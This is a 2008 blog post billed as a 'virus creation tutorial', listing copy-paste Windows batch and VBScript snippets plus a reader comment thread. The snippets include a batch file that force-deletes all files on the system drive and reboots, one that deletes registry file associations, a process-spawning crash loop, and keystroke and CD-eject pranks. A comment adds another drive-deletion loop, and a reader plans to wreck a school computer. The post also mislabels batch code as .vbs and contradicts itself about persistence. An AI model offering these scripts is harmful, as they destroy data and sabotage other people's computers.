The 8 deadly windows .vbs commands

by Sarang on December 2, 2008

vbs code The 8 deadly windows .vbs commands

Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial, iTechnoBuzz is not responsible for your loss.

Here on www.itechnobuzz.com , I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.

To use the codes I am going to provide, all you need to do is to copy the codes from iTechnoBuzz, paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.

-The blue screen of Death [this might be dangerous]

Code:-

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

-Stupidity Shutdown

*This pops up a funny message then will shutdown the computer*

code:-

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

-Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

-Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

-Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

-Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

-Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

{ 18 comments… read them below or add one }

avatar Bippy January 1, 2009 at 3:25 pm

Can you tell me what the “REGISTRY KEY DELETE VIRUS” will do. What damage will it do

avatar Christopher April 10, 2009 at 5:54 pm

@ Blippy:

I think that it deletes the whole windows registry.

avatar alex August 22, 2009 at 11:45 pm

HELLO! can you stop these from working? Thanks.

avatar chinks August 23, 2009 at 7:52 am

You just need to restart your computer .. and thats it.. they will get stopped automatically :)

avatar gary August 31, 2009 at 10:02 am

hey think of the registry as the part of windows os that tells the computer what programs are installed what are the settings (desktop,file manager etc etc) if this gets deleted you are fucked unless someone that is very good with computers can recover a back up so as you can see do not use this one on a computer that you want to keep

avatar chinks September 1, 2009 at 5:45 am

actually vbs commands lies until you restart your pc :-) ^_^ , so no need to worry about backup and stuff :)

avatar zane September 12, 2009 at 9:27 am

it says that all of these are harmful some are just dum and it is caled the The 8 DEADLY windows .vbs commands

avatar gjieamn October 23, 2009 at 9:06 am

that bvs command sucks… i want commands that will permanently delete the os and will have to reinstall my os thanks

avatar chinks October 23, 2009 at 7:31 pm

haha @ gjieam !! well , thn vbs wont work for you.. may be you should try some bat files, with making infinite loops within it.. they will run untill either hard drives get crashed or the OS gets corrupted.. !^_^ but as per my advice.. play safe :)

avatar jane November 3, 2009 at 12:48 pm

How will that work? will it trigger by clicking it? Or just by creating it?
thanks

avatar chinks November 3, 2009 at 9:33 pm

it will work only after you double click on it ;)

avatar beep February 16, 2010 at 11:37 am

to close it you goto task manager ctrl+shift+esc then goto processes tab and terminate wscript.exe

avatar aaron May 22, 2010 at 12:56 pm

two things
1. are all of thses .vbs and not .cmd cuz the stupidity was .cmd
2. y doesen’t the shutdown work 4 me. It keeps scrolling and scrolling in cmd?????? help

avatar Bliip January 30, 2011 at 3:04 am

How do we save all these??

avatar brian February 11, 2011 at 8:38 pm

time to destroy the school computer

avatar Erick May 21, 2011 at 5:54 am

Some of these dont work, -___-

avatar Dan April 13, 2012 at 7:56 pm

you dont need to restart just open task manager and go to processes
and then end the process named
wsscript.exe
done

avatar Anonymous April 16, 2012 at 2:10 pm

@echo off
:L
DEL C:\
goto L
//REM Loop Incase It Doesnt Work at First.

Save as.. Death.bat

Leave a Comment

Previous post:

Next post: